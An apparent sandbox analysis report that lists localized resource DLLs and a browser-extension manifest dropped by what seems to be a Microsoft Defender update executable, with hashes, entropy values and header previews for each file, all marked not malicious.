Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!......................................................................@.......................................... ..T................ ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.............I.........T...8...8........I.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....(..X....rsrc$02.... ......d...!Z...!.4@e_/x!......I.........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ca-ES\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	29928
Entropy (8bit):	4.970820382866816
Encrypted:	false
SSDEEP:	768:7rAjdTb3dD4GbRVgWV9Hw2b4HX4bi2KwNDFWhGWD3IDRU0MZ8HoR1PX6Lz:Yj0KoHPKf
MD5:	0EC7F6A6BDC86183AA58893F948989A2
SHA1:	ABFAB912AF53106A82CD50158EB147F5EC4A3456
SHA-256:	02FC3320529F9A51D88030CE7C03AC3A62517B8141768FE001B995DCFBB202F4
SHA-512:	CD6FC83F8F2A5F676ED60655BB607D2D6DA7D4A274A809D1CAB0854B2257E20CD7D4E0D0FC0C1A1AFD4D2E99F8F0A99A7B89C2C2EDF2F741F7DED7B3AE1DFAD1
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....JVa...........!.........R...............................................p.......S....@.......................................... ...N...........T... ...........................................................................................rdata..p...........................@..@.rsrc....N... ...P..................@..@.............JVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$..8J...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\com.microsoft.defender.be.chrome.json Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	350
Entropy (8bit):	4.8011887903612696
Encrypted:	false
SSDEEP:	6:3HWSjKNde/Ott+dmvVnEuLrORVCqwvFFaFlLulkNCB+SrxxLxeNCWHyLIo:L2kO+WnEeMOUlLAjB/1N/0o
MD5:	60A2FC65D3CC1D3DE9ECD2C5319738FC
SHA1:	873D18E03523BBE80D1410AA475ED6CC2DAF0D9D
SHA-256:	6C6F52B13235148AF305BD614779EA885C00B64D0BB7CC764E3C67198CC524A2
SHA-512:	36E8930108DA1B953DC07809A9E670F923A4F07EAC9AD2A229844E556595CE7383F35001E43AA6877FF42D9BD42C55BB2BF0ED05E058D4E8CFF65E6B2B7A7BFD
Malicious:	false
Reputation:	unknown
Preview:	{.. "name": "com.microsoft.defender.browser_extension.native_message_host",.. "description": "Native host for Microsoft Defender Browser Extension",.. "path": "mpextms.exe",.. "type": "stdio",.. "allowed_origins": [.. "chrome-extension://echcggldkblhodogklpincgchnpgcdco/",.. "chrome-extension://lcmcgbabdcbngcbcfabdncmoppkajglo/".. ]..}

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\cs-CZ\MpAsDesc.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	62696
Entropy (8bit):	4.4300925979744425
Encrypted:	false
SSDEEP:	768:7rpChXzlbrS2tVdqSp3wbjfKMoW4EEEddewzR1PiM5md:hChXz1Lf04SjfKMoW4t8ewzHPlmd
MD5:	71EA670E1886321DDDDF005D7B47A7FD
SHA1:	FB9AA4F04C6744123C2E38DE746983C1B82A6F00
SHA-256:	BC031DC51AE7128AEE1ADCCDA0F7ACC9EB3BBE8DE121B206B0E9801E956F82B7
SHA-512:	3BB516F32FC0516DE97CB520AED0E3976BC201183144AF54FF392BB73237767C50794F923C84E738D82A7430C6660EE7301891CACD1517F17DBB6C6391B46070
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!................................................................+.....@.......................................... ..l................ ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.............I.........T...8...8........I.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....(..X....rsrc$02.... ......d...!Z...!.4@e_/x!......I.........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\cs-CZ\MpEvMsg.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	53496
Entropy (8bit):	4.606804840809272
Encrypted:	false
SSDEEP:	768:7rdMyciFk6/zRyodW7/obSxnjEBIR1PbzT:lMyciFk6/zRy+bSxjwIHPPT
MD5:	C40C173214A061E8BCDF28F6328CAD40
SHA1:	A525D0203A18D9011712A7F6AD89FD84D90B5747
SHA-256:	17B281694628800A6B1541826B912F8FF0788D171A900F6DF4BA8A6AC01B3A46
SHA-512:	B72D26D86B1D28308686A1DD0AE513594D9875AD809C891B9B063220748470154846339D25C89B4EC904F838AD47B0438EB22925CD7C2E70C3686961476760AC
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!......................................................................@.......................................... ................... ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@............]..........T...8...8.......]..........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01..... ..8....rsrc$02.... ..._<.....5..\Z2........~..4]..........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\cs-CZ\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	28408
Entropy (8bit):	5.215365684019082
Encrypted:	false
SSDEEP:	768:7rIXE4QWX0YNoE8gZ04pC5DbUV4qFR1Peizz:Q04QWX0YNojgZ04pC5DbUV4qFHPeYz
MD5:	FFE6628B2AD343CDA7FDFEF38B84B48C
SHA1:	36A72C17996D63635B184CDEC836022A2FD275C7
SHA-256:	B5E81F2E96B81367B16D77BDB21FF45C92B880DF501AD17FEE4F8B1E756C636D
SHA-512:	B20694CA2B5E009BCD981C8FD3E95CF25E16E9293001CCCB53DEC2ABDE6A31535F9213492279BB9527DF0A86B0489DAB7014F3F2A67A3D6D26F26DD1B942B481
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....JVa...........!.........L...............................................p.......7....@.......................................... ..DH...........N... ...........................................................................................rdata..p...........................@..@.rsrc...DH... ...J..................@..@.............JVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$...C...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\cy-GB\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	30456
Entropy (8bit):	4.937872667222882
Encrypted:	false
SSDEEP:	384:7r9i3aB5tg/hPb1Y2YQYTZYxgaM3cNqng73m3cX3u3cjgTyTKT3TsjxTPTBTnTb2:7rhXP9KV7XcdLks3yRR1Pgz3
MD5:	CF1FB8FA2725C2DC530AE045F1ED8A6B
SHA1:	B64794C057E7F9F1F4A5DB0A9164FE21EFB32151
SHA-256:	EEB5D85389F768042AFEB2B1203BCC151069F53DAFED28DB404122013041241F
SHA-512:	259CC37B8488D7B9244450864F4AD2ABDC9A7C8355833F5A1628D5DC4A3123A2FCDBDCC2B8169DA2613527D8885C081915651B41228DEDAC6E5E70D1CC4F9C4D
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....JVa...........!.........T......................................................fT....@.......................................... ..TQ...........V... ...........................................................................................rdata..p...........................@..@.rsrc...TQ... ...R..................@..@.............JVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$...L...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\da-DK\MpAsDesc.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	63720
Entropy (8bit):	4.2102783984881755
Encrypted:	false
SSDEEP:	768:7rRXQqbVuA8rmOXbO5OKi9OUsUR1P11zf:JXQqBuA8b6UHPPf
MD5:	BB1447340673FA9F6B96A9987290F278
SHA1:	C43D250E3BEF83C88A2BB5EA7FA68F54895C2FA5
SHA-256:	A166D52AA0AB379DE33CF5796A5B1861246A36BB8B17D8C87E0F0529338C0AC3
SHA-512:	F0D83F03C31E45C079E1ADE32A4801A6C5B8F71D23421E6D08C655E1216F4A6A3E58F8930C1F3D72CAB8FF25536017D2F1D458FCB97FB848E83830B331A3C3C4
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!.................................................................K....@.......................................... ..T................ ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.............I.........T...8...8........I.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....(..X....rsrc$02.... ......d...!Z...!.4@e_/x!......I.........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\da-DK\MpEvMsg.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	54520
Entropy (8bit):	4.3994496582380975
Encrypted:	false
SSDEEP:	384:7rpjcx80WKqt9o5uDwepIRXVCQECoz0NKERDH9rLdGtKWfwLW6RDBRJiOhl95UN:7rWxnkErR1PZzUN
MD5:	849192FB21F761073C9ED4A3F5BD4688
SHA1:	A9AAA641C02833616CC0165FA47499DFC1269D7A
SHA-256:	1EAC8A8C05B8AAFB4505A7828D7E7F98567BD0C71DEE4E08AF467F31D34A9828
SHA-512:	F5216D11DC25B246567A1F31B1613533EB57A28FC88AAF7D1064426D6E9488C597F5F3BC7DCA29D3FEC4D239EB86675476488EAE4309F239649740F9D739297E
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!................................................................V.....@.......................................... .................. ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@............]..........T...8...8.......]..........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01..... ..8....rsrc$02.... ..._<.....5..\Z2........~..4]..........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\da-DK\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	28904
Entropy (8bit):	5.034399544515469
Encrypted:	false
SSDEEP:	384:7rV9LJoeS3TVu8td5dCWS8/WtRDBRJjfVslGsJ/Qw:7r7LEVHJIR1PjzLw
MD5:	C63C9C4C55D3B4172BADC2FB45014D5D
SHA1:	DC46D629995E862BA72C80ADC45F62DAD3590728
SHA-256:	88346BDE6D5FC1C0CADFA5755944F466F8960C9CC17A5339851A2BAD42376C70
SHA-512:	F838B0338C194BA2E820B10EC4E2397511AE61A14C6684AF99996DCABED5D225F9672BC4053DF9AAB6F2D586806908DC07BA43C2ADC191081C5F3E5D58E1485D
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....JVa...........!.........N...............................................p............@.......................................... ..XJ...........P... ...........................................................................................rdata..p...........................@..@.rsrc...XJ... ...L..................@..@.............JVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$...E...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\de-DE\MpAsDesc.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	70392
Entropy (8bit):	4.18694461018496
Encrypted:	false
SSDEEP:	1536:g9J3VugBgOPS611GRF9QRquPJAQ7GyHPvt:g9J3VugBgOPS611s/QRquRAQ7Ggd
MD5:	FF00B121B166AB8E4857EABE4AAB9BCC
SHA1:	8CA305D4979F693BCC8425A972438A9074B92C5D
SHA-256:	9285FDDC5E40919E750A95C255588332876547495F6E245BAD983D612DAA4704
SHA-512:	2CC52CBB0EDCAD8BBAFD934E3B259048250F0DF4687FE8FC3F9B3764071F5E1E708FA870EB91D8868687F8A91677C9EBA287AAC195478C613042C97B33495286
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!......................................................................@.......................................... ..@................ ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.............I.........T...8...8........I.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....(..X....rsrc$02.... ......d...!Z...!.4@e_/x!......I.........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\de-DE\MpEvMsg.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	54504
Entropy (8bit):	4.451774666927673
Encrypted:	false
SSDEEP:	768:7rBOW84CvPTO3VUtmUz8J0GXv3Y1VKLhR1P+pa:v84kt9qAohHP+pa
MD5:	7AF483C2AFFDD95213DDDC495D001DC0
SHA1:	C65458CBD4209A7B09129D5FDD171C758D6A7991
SHA-256:	155EC9FBBE052BCCF189B89EF0F802DA48547D107A26A9E342BF9A23B4F1ADFF
SHA-512:	6DF51B3E38AFB35BCAA066F3DDD56497B9E104D768C5AB1348A82BB7F1B70ED332CACCF302699AA97CC3095252B915F209BAD52F2495A31210CF90DF1940205F
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!................................................................S.....@.......................................... ..@................ ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@............]..........T...8...8.......]..........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01..... ..8....rsrc$02.... ..._<.....5..\Z2........~..4]..........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\de-DE\ProtectionManagement.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	53480
Entropy (8bit):	5.4939020981100315
Encrypted:	false
SSDEEP:	1536:OEH8Kt3U5Pfr9Y5BKqpdmXD6pyFJz1Z9YRHPdE:OKRmpYCmmXXZ9YdS
MD5:	381A9FC19B05718037AA3A552715C54F
SHA1:	01DC93DA9A279EBAC49E7564035849AE3EF4B151
SHA-256:	EA4DDE3088A05BA4A894FB81A8ABF0769DB0A8F79F9D1E5E96BEB916610710C4
SHA-512:	423EDF0088AAF42334F097F7687D964E27293AB508AABDD5A3FF7A2F89E9AB4145FE7BE9FC9E0A00C450F8DBABA2F841252EA9A8A0F7845090E84AA17E5BD34A
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!......................................................................@.......................................... ................... ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@............l...........T...8...8.......l...........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....%..H....rsrc$02.... ...=..E.......'G.:3..t.E....R<l...........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\de-DE\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	31480
Entropy (8bit):	4.903514449361369
Encrypted:	false
SSDEEP:	768:7rf5229Ah0vyaffaXQQOvR8PMFXNJSMbsHrWzxWaNnmeduHJJ17CpR1PPGLh:n5229Ah0vyaffaXQQOvR8PMFXNJSMbsT
MD5:	16C6FFA34E0C59EE77F916EBF9148AFC
SHA1:	C82E4308AC0A909BF4387B86B62320DA9E1FEF51
SHA-256:	6EE8E608A103E991460B51D87AEFCA126EC8744642559B536F70330A848CFB08
SHA-512:	782A0BEE60D339B86A176201C84A8AE117458C1688AF3D0089696ED8124E2006676A91C15E117904FE1FBBF6E4F72D248E75086E9E24436E16CFE458E8521A8E
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....JVa...........!.........X...........................................................@.......................................... ..@U...........Z... ...........................................................................................rdata..p...........................@..@.rsrc...@U... ...V..................@..@.............JVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$..xP...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\el-GR\MpAsDesc.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	75000
Entropy (8bit):	4.68621286355812
Encrypted:	false
SSDEEP:	1536:c3yX1MSgKNnNL+/euj7eCMEE+gL8hKfGujCCaCa52HPJ:c3yX1MSgKNnNL+/euj7eCMEE+gL8hKfH
MD5:	53B61803FB8BDC469ED5D04FB8983233
SHA1:	FB801EDEB5CCBE9E75C2CBA7A28FF05BFEEA270F
SHA-256:	BE1609A94963D07A591C7D38947B28AE79A9D070385E70BD594A1DBD6DF7EB31
SHA-512:	678F7D40E6F54A481353FF0C7AA1C21FAEC66C8B05546CF9AC4B2372EED51918A53A0D4509C12A7DC6B8B2175A86C19C84C5274735560AA2B62B97347A5E2790
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!......................................................... ............@.......................................... ................... ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.............I.........T...8...8........I.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....(..X....rsrc$02.... ......d...!Z...!.4@e_/x!......I.........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\el-GR\MpEvMsg.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	60152
Entropy (8bit):	4.994721555651978
Encrypted:	false
SSDEEP:	768:7rpd0tgeGeGsnEstzuFtGFil0a9+R1PEcz3:OgTsnPtzuFtGFil0i+HPF
MD5:	9B6F194F0D0EB1ED21B000E07B0CBDCD
SHA1:	FB2E6FF6B553B1E25C142FBD5CF868B98A0E8C2F
SHA-256:	E1A7E2391FFF39162293DD3AE201ADC393D8CC91E83A4B33C2C9A089EE69D203
SHA-512:	F64454892E8E12A33A887CE930A6DFD708CDDD1F76CFEFD909D5AA6ECF0098DB49AC263F4DD2C601A7A12FEC6221F806C4035A5EC8C928CC785550D644720EB0
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!................................................................(.....@.......................................... ................... ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@............]..........T...8...8.......]..........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01..... ..8....rsrc$02.... ..._<.....5..\Z2........~..4]..........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\el-GR\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	30952
Entropy (8bit):	5.453443722839373
Encrypted:	false
SSDEEP:	384:7rqYFfMlN2vyRBNd/gy0b5DYpOLjNB4Okn8OM3mnUJOeTPn5yLOe0FZQiJZhFD7a:7rP6EBZa2z6R1PV/rF
MD5:	222D67D112493530069E47CD64364BAF
SHA1:	F4F6F74D62470C5301BDC537ADC451FEAFBCCEBD
SHA-256:	B6E4B5BF805802069890DF5FD769D48F370620E607809E48E233C78EFE6F90F1
SHA-512:	4A8EEA2ADEDFC1E7267E13F369F50E17AE2A578E28CC15C248F54444925D0196F509F8FF16E8011DC30EB28A8A3E9620F0716E27B50D6933B1283433BF2A88F3
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....JVa...........!.........V.......................................................^....@.......................................... ...S...........X... ...........................................................................................rdata..p...........................@..@.rsrc....S... ...T..................@..@.............JVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$..@N...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\en-GB\MpAsDesc.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	58600
Entropy (8bit):	4.25269307683972
Encrypted:	false
SSDEEP:	768:7rSJb3XsmqEiqcTr247sEBhEChEehELQRQ4hEYDGR1PYq:qJb3XDqZqc/7skv7rfGHPYq
MD5:	8DE66C308CA2A9340CC9E84F753FAA56
SHA1:	8D70F8339E74BD7730E0E876D3B23412CCB1DA63
SHA-256:	AE6A41CA40A926287BCC94503AC9AD42568D6BB62B4CF2DF60F0599FA9E988FF
SHA-512:	E0E6D0919E21049618E23F7850F83015A9EBB2A802EED22A9ED547421552F3BD2AD3B76BBC66966BA935EF5A152B235EB4A4D5C60379CCA4A2223D5514674ED6
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!.....................................................................@.......................................... .................. ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.............I.........T...8...8........I.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....(..X....rsrc$02.... ......d...!Z...!.4@e_/x!......I.........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\en-GB\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	27880
Entropy (8bit):	5.0955466583627835
Encrypted:	false
SSDEEP:	384:7rTHD0EhR32NSWS8/W5RDBRJqH24rlGsQhJ+:7rbYhtMR1P26LQ
MD5:	DD65190763621E8E1B642A4305D5E801
SHA1:	D9BCFD1CBDC637B9F1211BADEF89F55B8C19D1E3
SHA-256:	8CBEC55311F2B7234D1FBD9C46AB6CF33A165610960132FE73C19FF725579658
SHA-512:	C51D7DC6B9410AFE72BD2C65989469FFF3ED6B41C5D5C9ED1320EEAD78742B840CED18C2B479DB06959B9DF69F28C116B047AE8D4A5ABBF3AB9546713E878C7D
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....JVa...........!.........J...............................................p......R.....@.......................................... ...F...........L... ...........................................................................................rdata..p...........................@..@.rsrc....F... ...H..................@..@.............JVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$..HA...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\en-US\MpAsDesc.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	59128
Entropy (8bit):	4.293356301291751
Encrypted:	false
SSDEEP:	768:7rxiJbyt33aEhrdTTm147vXahEzhEthEGQRQwhE3DbR1PR:5iJbytHa6rdd7vM+4ImbHPR
MD5:	BC78A3B5260E268C292724EA573194F9
SHA1:	02D4A4E683609B5B61834520D27B138EF3F9F7C4
SHA-256:	2C4B8F48370B6ADEA49A21F2D89F2400E54C3EE937120152B50A94FFE5F5F7A9
SHA-512:	985B104584656A099A5C20C85C77488D2575CA518353DF585B99E37B0596A46BFF5C32DF197A823569BF6909755406C48B9D41861A1C4A947BF1FE616519AF90
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!......................................................................@.......................................... ................... ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.............I.........T...8...8........I.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....(..X....rsrc$02.... ......d...!Z...!.4@e_/x!......I.........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\en-US\MpEvMsg.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	51944
Entropy (8bit):	4.448866330393985
Encrypted:	false
SSDEEP:	384:7rsorOioFEr4H1n3/Dtkby/g1mwhqfB9hyINcNkHoal34Y0wNl8yWucBW+RDBRJD:7rcBH1/b4Y0wNl8Cc5R1PeX8
MD5:	0D87F3932078B4049523B8CDD3EE5692
SHA1:	EA172545FB8E872BE0FC9AF0B58C3FA8CAF6F970
SHA-256:	46022C8F7CC601BF73D231C213612BFAED0E95A76BC510DA08B7323EC1CCB2EE
SHA-512:	51CFF3304353B5992D63C2F0C1CA71ACD74E3A4E8EF009B525BD6720BA4BCEA83A212516E41E086AFDB74E7A36DE0E4674517CAD84D8EB2E7545E34773D35554
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!................................................................}(....@.......................................... ..$................ ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@............]..........T...8...8.......]..........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01..... ..8....rsrc$02.... ..._<.....5..\Z2........~..4]..........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\en-US\ProtectionManagement.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe
